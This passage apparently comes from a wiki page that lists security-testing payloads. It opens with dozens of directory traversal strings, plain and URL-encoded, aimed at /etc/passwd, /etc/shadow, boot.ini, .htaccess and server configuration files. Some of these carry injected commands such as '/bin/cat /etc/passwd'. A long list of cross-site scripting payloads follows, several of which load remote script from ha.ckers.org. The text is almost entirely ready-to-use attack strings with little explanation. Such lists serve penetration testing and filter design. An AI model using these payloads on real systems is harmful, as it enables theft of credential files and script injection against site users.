%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
